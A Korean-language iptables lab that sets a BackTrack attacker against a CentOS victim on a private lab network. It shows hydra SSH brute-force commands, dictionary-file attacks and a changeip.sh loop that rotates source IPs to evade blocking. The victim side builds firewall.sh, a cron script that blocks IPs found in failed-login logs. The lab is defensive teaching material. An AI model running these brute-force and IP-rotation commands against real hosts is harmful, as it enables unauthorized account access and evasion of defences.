======================================================================
IPTABLES-LAB> 보안도구를 작성한 후에 공격 테스트를 해보자.
Attacker(BT) : 192.168.56.240
Victim(CentOS) : 192.168.56.200
공격형태 : White box test
- Attacker 설정 -
1. bt 부팅
2. ssh 로 로그인
3. 공격
1. bt 부팅
- root/toor
- VB Guest OS 생성 ( Ubuntu, 32bit 세팅 ), eth1 추가
Attacker# startx
2. ssh 로 로그인
Attacler# ifconfig eth1:0 192.168.56.240
Attacker# sshd-generate
Attacker# /etc/init.d/ssh start
Attacker# netstat -nat | grep 22
Attacker# passwd
Xshell 로 로그인
3. 공격
hydra usage :
hydra -l john -p doe 192.168.0.1 ssh
hydra -L user.txt -P pass.txt 192.168.0.1 ssh
단일 사용자와 비번으로 공격
Victim# tail -f /var/log/secure
:
:
Attacker# hydra -l abc -p aaaa 192.168.56.200 ssh
:
1 of 1 target successfuly completed, 0 valid passwords found
:
- 공격자가 hydra로 공격하면 로그파일에 해당 접속 로그가 기록된다.
Victim# tail -f /var/log/secure
:
:
Jul 29 09:50:34 localhost sshd[10166]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.101 user=abc
Jul 29 09:50:38 localhost sshd[10166]: Failed password for abc from 192.168.56.101 port 44737 ssh2
Jul 29 09:50:38 localhost sshd[10167]: Connection closed by 192.168.56.101
Jul 29 09:50:38 localhost sshd[10166]: PAM 1 more authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.101 user=abc
Victim# useradd abc
Victim# echo 1234 | passwd --stdin abc
Attacker# hydra -l abc -p 1234 192.168.56.200 ssh
:
1 of 1 target successfuly completed, 1 valid password found
사전파일로 공격
- 실제 사용
Attacker# cat >> user.txt
linux
windows
admin
adminuser
abc
Attacke# cat >> pass.txt
akfdj
3i3u2
kasdjf
1234
Victim# tail -f /var/log/secure
:
Attacker# hydra -L user.txt -P pass.txt 192.168.56.200 ssh
IP주소를 변경하면서 공격
- IP주소를 변경하면서 공격을 하면 로그에 어떻게 기록되는지 확인해보자.
Victim# tail -f /var/log/secure
:
Attacker# for i in `seq 50 59`
do
ifconfig eth1 192.168.56.$i
hydra -l admin -p 1234 192.168.56.200 ssh > /dev/null 2>&1
done
- 기록되는 로그는 아래와 같다.
Victim# tail -f /var/log/secure
:
Jul 29 10:20:39 localhost sshd[10376]: input_userauth_request: invalid user admin
Jul 29 10:20:39 localhost sshd[10375]: pam_unix(sshd:auth): check pass; user unknown
Jul 29 10:20:39 localhost sshd[10375]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.50
Jul 29 10:20:39 localhost sshd[10375]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Jul 29 10:20:41 localhost sshd[10375]: Failed none for invalid user admin from 192.168.56.50 port 48340 ssh2
Jul 29 10:20:41 localhost sshd[10375]: pam_unix(sshd:auth): check pass; user unknown
Jul 29 10:20:41 localhost sshd[10375]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Jul 29 10:20:43 localhost sshd[10375]: Failed password for invalid user admin from 192.168.56.50 port 48340 ssh2
Jul 29 10:20:43 localhost sshd[10376]: Connection closed by 192.168.56.50
Jul 29 10:20:43 localhost sshd[10375]: PAM 1 more authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.50
Jul 29 10:20:43 localhost sshd[10378]: Invalid user admin from 192.168.56.51
Jul 29 10:20:43 localhost sshd[10379]: input_userauth_request: invalid user admin
Jul 29 10:20:43 localhost sshd[10378]: pam_unix(sshd:auth): check pass; user unknown
Jul 29 10:20:43 localhost sshd[10378]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.51
Jul 29 10:20:43 localhost sshd[10378]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Jul 29 10:20:45 localhost sshd[10378]: Failed none for invalid user admin from 192.168.56.51 port 41454 ssh2
Jul 29 10:20:45 localhost sshd[10378]: pam_unix(sshd:auth): check pass; user unknown
Jul 29 10:20:45 localhost sshd[10378]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Jul 29 10:20:47 localhost sshd[10378]: Failed password for invalid user admin from 192.168.56.51 port 41454 ssh2
Jul 29 10:20:47 localhost sshd[10379]: Connection closed by 192.168.56.51
Jul 29 10:20:47 localhost sshd[10378]: PAM 1 more authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.51
Jul 29 10:20:47 localhost sshd[10380]: Invalid user admin from 192.168.56.52
Jul 29 10:20:47 localhost sshd[10381]: input_userauth_request: invalid user admin
Jul 29 10:20:47 localhost sshd[10380]: pam_unix(sshd:auth): check pass; user unknown
Jul 29 10:20:47 localhost sshd[10380]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.52
Jul 29 10:20:47 localhost sshd[10380]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Jul 29 10:20:49 localhost sshd[10380]: Failed none for invalid user admin from 192.168.56.52 port 43956 ssh2
Jul 29 10:20:49 localhost sshd[10380]: pam_unix(sshd:auth): check pass; user unknown
Jul 29 10:20:49 localhost sshd[10380]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Jul 29 10:20:51 localhost sshd[10380]: Failed password for invalid user admin from 192.168.56.52 port 43956 ssh2
Jul 29 10:20:51 localhost sshd[10381]: Connection closed by 192.168.56.52
Jul 29 10:20:51 localhost sshd[10380]: PAM 1 more authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.52
Jul 29 10:20:52 localhost sshd[10382]: Invalid user admin from 192.168.56.53
Jul 29 10:20:52 localhost sshd[10383]: input_userauth_request: invalid user admin
Jul 29 10:20:52 localhost sshd[10382]: pam_unix(sshd:auth): check pass; user unknown
Jul 29 10:20:52 localhost sshd[10382]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.53
Jul 29 10:20:52 localhost sshd[10382]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Jul 29 10:20:54 localhost sshd[10382]: Failed none for invalid user admin from 192.168.56.53 port 48510 ssh2
Jul 29 10:20:54 localhost sshd[10382]: pam_unix(sshd:auth): check pass; user unknown
Jul 29 10:20:54 localhost sshd[10382]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Jul 29 10:20:55 localhost sshd[10382]: Failed password for invalid user admin from 192.168.56.53 port 48510 ssh2
Jul 29 10:20:55 localhost sshd[10383]: Connection closed by 192.168.56.53
Jul 29 10:20:55 localhost sshd[10382]: PAM 1 more authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.53
Jul 29 10:20:56 localhost sshd[10384]: Invalid user admin from 192.168.56.54
Jul 29 10:20:56 localhost sshd[10385]: input_userauth_request: invalid user admin
Jul 29 10:20:56 localhost sshd[10384]: pam_unix(sshd:auth): check pass; user unknown
Jul 29 10:20:56 localhost sshd[10384]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.54
Jul 29 10:20:56 localhost sshd[10384]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Jul 29 10:20:58 localhost sshd[10384]: Failed none for invalid user admin from 192.168.56.54 port 46069 ssh2
Jul 29 10:20:58 localhost sshd[10384]: pam_unix(sshd:auth): check pass; user unknown
Jul 29 10:20:58 localhost sshd[10384]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Jul 29 10:21:00 localhost sshd[10384]: Failed password for invalid user admin from 192.168.56.54 port 46069 ssh2
Jul 29 10:21:00 localhost sshd[10385]: Connection closed by 192.168.56.54
Jul 29 10:21:00 localhost sshd[10384]: PAM 1 more authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.54
Jul 29 10:21:00 localhost sshd[10386]: Invalid user admin from 192.168.56.55
Jul 29 10:21:00 localhost sshd[10387]: input_userauth_request: invalid user admin
Jul 29 10:21:00 localhost sshd[10386]: pam_unix(sshd:auth): check pass; user unknown
Jul 29 10:21:00 localhost sshd[10386]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.55
Jul 29 10:21:00 localhost sshd[10386]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Jul 29 10:21:02 localhost sshd[10386]: Failed none for invalid user admin from 192.168.56.55 port 49600 ssh2
Jul 29 10:21:02 localhost sshd[10386]: pam_unix(sshd:auth): check pass; user unknown
Jul 29 10:21:02 localhost sshd[10386]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Jul 29 10:21:04 localhost sshd[10386]: Failed password for invalid user admin from 192.168.56.55 port 49600 ssh2
Jul 29 10:21:04 localhost sshd[10387]: Connection closed by 192.168.56.55
Jul 29 10:21:04 localhost sshd[10386]: PAM 1 more authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.55
Jul 29 10:21:04 localhost sshd[10388]: Invalid user admin from 192.168.56.56
Jul 29 10:21:04 localhost sshd[10389]: input_userauth_request: invalid user admin
Jul 29 10:21:04 localhost sshd[10388]: pam_unix(sshd:auth): check pass; user unknown
Jul 29 10:21:04 localhost sshd[10388]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.56
Jul 29 10:21:04 localhost sshd[10388]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Jul 29 10:21:06 localhost sshd[10388]: Failed none for invalid user admin from 192.168.56.56 port 59305 ssh2
Jul 29 10:21:06 localhost sshd[10388]: pam_unix(sshd:auth): check pass; user unknown
Jul 29 10:21:06 localhost sshd[10388]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Jul 29 10:21:08 localhost sshd[10388]: Failed password for invalid user admin from 192.168.56.56 port 59305 ssh2
Jul 29 10:21:08 localhost sshd[10389]: Connection closed by 192.168.56.56
Jul 29 10:21:08 localhost sshd[10388]: PAM 1 more authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.56
Jul 29 10:21:08 localhost sshd[10390]: Invalid user admin from 192.168.56.57
Jul 29 10:21:08 localhost sshd[10391]: input_userauth_request: invalid user admin
Jul 29 10:21:08 localhost sshd[10390]: pam_unix(sshd:auth): check pass; user unknown
Jul 29 10:21:08 localhost sshd[10390]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.57
Jul 29 10:21:08 localhost sshd[10390]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Jul 29 10:21:11 localhost sshd[10390]: Failed none for invalid user admin from 192.168.56.57 port 52213 ssh2
Jul 29 10:21:11 localhost sshd[10390]: pam_unix(sshd:auth): check pass; user unknown
Jul 29 10:21:11 localhost sshd[10390]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Jul 29 10:21:13 localhost sshd[10390]: Failed password for invalid user admin from 192.168.56.57 port 52213 ssh2
Jul 29 10:21:13 localhost sshd[10391]: Connection closed by 192.168.56.57
Jul 29 10:21:13 localhost sshd[10390]: PAM 1 more authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.57
Jul 29 10:21:13 localhost sshd[10392]: Invalid user admin from 192.168.56.58
Jul 29 10:21:13 localhost sshd[10393]: input_userauth_request: invalid user admin
Jul 29 10:21:13 localhost sshd[10392]: pam_unix(sshd:auth): check pass; user unknown
Jul 29 10:21:13 localhost sshd[10392]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.58
Jul 29 10:21:13 localhost sshd[10392]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Jul 29 10:21:15 localhost sshd[10392]: Failed none for invalid user admin from 192.168.56.58 port 55600 ssh2
Jul 29 10:21:15 localhost sshd[10392]: pam_unix(sshd:auth): check pass; user unknown
Jul 29 10:21:15 localhost sshd[10392]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Jul 29 10:21:17 localhost sshd[10392]: Failed password for invalid user admin from 192.168.56.58 port 55600 ssh2
Jul 29 10:21:17 localhost sshd[10393]: Connection closed by 192.168.56.58
Jul 29 10:21:17 localhost sshd[10392]: PAM 1 more authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.58
Jul 29 10:21:17 localhost sshd[10394]: Invalid user admin from 192.168.56.59
Jul 29 10:21:17 localhost sshd[10395]: input_userauth_request: invalid user admin
Jul 29 10:21:17 localhost sshd[10394]: pam_unix(sshd:auth): check pass; user unknown
Jul 29 10:21:17 localhost sshd[10394]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.59
Jul 29 10:21:17 localhost sshd[10394]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Jul 29 10:21:20 localhost sshd[10394]: Failed none for invalid user admin from 192.168.56.59 port 45389 ssh2
Jul 29 10:21:20 localhost sshd[10394]: pam_unix(sshd:auth): check pass; user unknown
Jul 29 10:21:20 localhost sshd[10394]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Jul 29 10:21:22 localhost sshd[10394]: Failed password for invalid user admin from 192.168.56.59 port 45389 ssh2
Jul 29 10:21:22 localhost sshd[10395]: Connection closed by 192.168.56.59
Jul 29 10:21:22 localhost sshd[10394]: PAM 1 more authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.59
- Victim 설정 -
1. 사용자 생성
2. 로그 확인
3. 방화벽에 자동 등록
1. 사용자 생성
Victim# useradd abc
Victim# echo 1234 | passwd --stdin abc
2. 로그 확인
- /var/log/secure 에 기록이 안되면 /var/log/messages 를 확인한다.
- Attacker 가 공격을 했을때 로그가 남는 3가지 유형
- 사용자가 없을때의 로그확인
- 사용자가 있지만 비번이 틀린 경우의 로그확인
- 사용자와 비번이 맞는 경우 로그확인
Victim# tail -f /var/log/secure
3. 방화벽에 자동 등록
- 아래 보안도구를 만들어보자 LAB을 참고한다.
Victim# firewall.sh
Victim# iptables -nvL DROP-IP
Chain DROP-IP (1 references)
target prot opt source destination
DROP all -- 192.168.56.59 0.0.0.0/0
DROP all -- 192.168.56.58 0.0.0.0/0
DROP all -- 192.168.56.57 0.0.0.0/0
DROP all -- 192.168.56.56 0.0.0.0/0
DROP all -- 192.168.56.55 0.0.0.0/0
DROP all -- 192.168.56.54 0.0.0.0/0
DROP all -- 192.168.56.53 0.0.0.0/0
DROP all -- 192.168.56.52 0.0.0.0/0
DROP all -- 192.168.56.51 0.0.0.0/0
DROP all -- 192.168.56.50 0.0.0.0/0
DROP all -- 192.168.56.240 0.0.0.0/0
======================================================================
======================================================================
IPTABLES-LAB> 보안도구를 만들어보자.
-- 작업 순서 --
1. 방화벽 정책 설정
2. 보안도구 생성 (shell script 를 이용한다.)
3. cron 에 등록
4. 확인
-- 작업 순서 --
INPUT -------------> OUTPUT
| ^ 4
| |
| | 3
| +-------------------+
| |
+--> ACCEPT-IP --> DROP-IP
1 2
Victim# iptables -F
Victim# iptables -N ACCEPT-IP
Victim# iptables -N DROP-IP
Victim# iptables -A INPUT -j ACCEPT-IP <-- INPUT -> ACCEPT-IP 로
Victim# iptables -A ACCEPT-IP -j DROP-IP <-- ACCEPT-IP -> DROP-IP 로
- 생성된 체인을 확인한다.
Victim# iptables -nL
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
Chain ACCEPT-IP (0 references)
target prot opt source destination
Chain DROP-IP (0 references)
target prot opt source destination
1. 방화벽 정책 설정
- 방화벽룰 테스트를 작성한다.
- 192.168.56.1 (관리자 IP주소라고 가정) : ACCEPT
- 192.168.56.201 (공격자 IP주소라고 가정) : DROP
- 관리자가 사용하는 IP주소인 192.168.56.1 을 신뢰하므로 무조건 허용한다.
Victim# iptables -I ACCEPT-IP -s 192.168.56.1 -j ACCEPT
- 공격자의 IP주소가 192.168.56.201 이라고 가정하고 공격자 IP는 막는다.
Victim# iptables -I DROP-IP -s 192.168.56.201 -j DROP
- 공격자의 IP주소를 DROP-IP에 등록된 IP주소로 변경하고 공격해보자.
- 공격자가 공격을 하지만 Victim의 방화벽 룰에 막혀서 로그가 기록이 안될 것이다.
Victim# tail -f /var/log/secure
:
:
Attacker# ifconfig eth1 192.168.56.201
Attacker# hydra -l test -p 1234 192.168.56.200 ssh
Victim# iptables -nvL DROP-IP
Chain DROP-IP (1 references)
pkts bytes target prot opt in out source destination
19 3115 DROP all -- * * 192.168.56.201 0.0.0.0/0
2. 보안도구 생성
- 여기서는 shell script 를 이용하여 짜보자.
Victim# mkdir ~/bin
Victim# install /dev/null ~/bin/firewall.sh
Victim# vi ~/bin/firewall.sh
-- ~/bin/firewall.sh --
#!/bin/sh
# shell script 를 이용한 자동화된 공격IP 차단 룰 생성 프로그램
IPTABLE_CHAIN=DROP-IP
BLOCK_IP1=$(grep Invalid /var/log/secure | awk '{print $10}' | sort | uniq )
BLOCK_IP2=$(grep Fail /var/log/secure | awk '{print $13}' | sort | uniq )
# IP address 검사
# 리턴값 : 0 (true), 1 (false)
valid_ipaddr()
{
while [ $# -gt 0 ]
do
# 시작[0-9]표현이 1부터 3번까지 반복
# bash 버전 3(2004년)부터 bash는 =~ 로 표기하는 내장형 정규 표현식
# 비교 연산자를 갖추었다.
# 그래서 사실 스크립트에서 grep이나 sed로 하는 작업의 상당수는 이
# 연산자로 처리할 수 있다
if [[ "$1" =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]
then
return 0 # valid ip address
else
return 1 # invalid ip address
fi
shift
done
}
for i in $BLOCK_IP1 $BLOCK_IP2
do
# 디버깅
# echo $i
# IP주소 유효성 검사 부분으로
# IP주소가 아니면 진행을 금지시키고 다시 for 문으로 보낸다.
valid_ipaddr $i
[ $? -eq 1 ] && continue
# IP주소 중복 체크
/sbin/iptables -nL DROP-IP | grep $i > /dev/null 2>&1
ret_value=$?
[ $ret_value -eq 0 ] && continue
# 공격자 IP를 등록
/sbin/iptables -I $IPTABLE_CHAIN -s $i -j DROP
done
-- ~/bin/firewall.sh --
스크립트 테스트
# iptables -nL DROP-IP
Chain DROP-IP (1 references)
target prot opt source destination
- 공격 쉘스크립트를 실행한다.
# firewall.sh
# iptables -nL DROP-IP
Chain DROP-IP (1 references)
target prot opt source destination
DROP all -- 192.168.56.59 0.0.0.0/0
DROP all -- 192.168.56.58 0.0.0.0/0
DROP all -- 192.168.56.57 0.0.0.0/0
DROP all -- 192.168.56.56 0.0.0.0/0
DROP all -- 192.168.56.55 0.0.0.0/0
DROP all -- 192.168.56.54 0.0.0.0/0
DROP all -- 192.168.56.53 0.0.0.0/0
DROP all -- 192.168.56.52 0.0.0.0/0
DROP all -- 192.168.56.51 0.0.0.0/0
DROP all -- 192.168.56.50 0.0.0.0/0
- 공격자의 IP주소가 잘 들어가면 초기화 시킨다.
# iptables -F DROP-IP
3. cron 에 등록
Victim# crontab -e
* * * * * /root/bin/firewall.sh
4. 확인
Victim# iptables -nL DROP-IP
======================================================================
======================================================================
IPTABLES-LAB> 공격 IP를 변경하고 공격을 해보자.
IP변경 스크립트 : changeip.sh
변경 IP : 192.168.56.20 ~ 50
Attacker# install /dev/null changeip.sh
Attacker# vi changeip.sh
-- changeip.sh --
#!/bin/sh
#!/bin/sh
for i in $(seq 20 50)
do
ifconfig eth1 192.168.56.$i
hydra -l root -p 1234 192.168.56.200 ssh
hydra -l poweruser -p 1234 192.168.56.200 ssh
hydra -l linuser1234 -p 1234 192.168.56.200 ssh
done
-- changeip.sh --
Attacker# changeip.sh
Victim# tail -f /var/log/secure
Victim# firewall.sh <-- cron 에 등록이 안되었을 경우 바로 실행
- 확인
Victim# iptables -nvL DROP-IP
Victim# iptables -nvL DROP-IP | wc -l
======================================================================
======================================================================
LAB> IP 주소를 테스트하는 함수를 작성한다.
-- iptest.txt --
1.1.1.1
2.2.2.2
abc
3333
211.33.11.
-- iptest.txt --
-- ipaddr_check.sh --
#!/bin/sh
valid_ipaddr()
{
while [ $# -gt 0 ]
do
# 시작[0-9]표현이 1부터 3번까지 반복
# bash 버전 3(2004년)부터 bash는 =~ 로 표기하는 내장형 정규 표현식
# 비교 연산자를 갖추었다.
# 그래서 사실 스크립트에서 grep이나 sed로 하는 작업의 상당수는 이
# 연산자로 처리할 수 있다
if [[ "$1" =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]
then
return 0 # valid ip address
else
return 1 # invalid ip address
fi
shift
done
}
for i in $(cat iptest.txt)
do
printf "i = $i : "
valid_ipaddr $i
echo $?
done
-- ipaddr_check.sh --
IP주소 체크
- IP주소를 체크한다.
- 0 : 정상 IP주소
- 1 : 비정상 IP주소
# ./ipaddr_check.sh
i = 1.1.1.1 : 0
i = 2.2.2.2 : 0
i = abc : 1
i = 3333 : 1
i = 211.33.11. : 1
======================================================================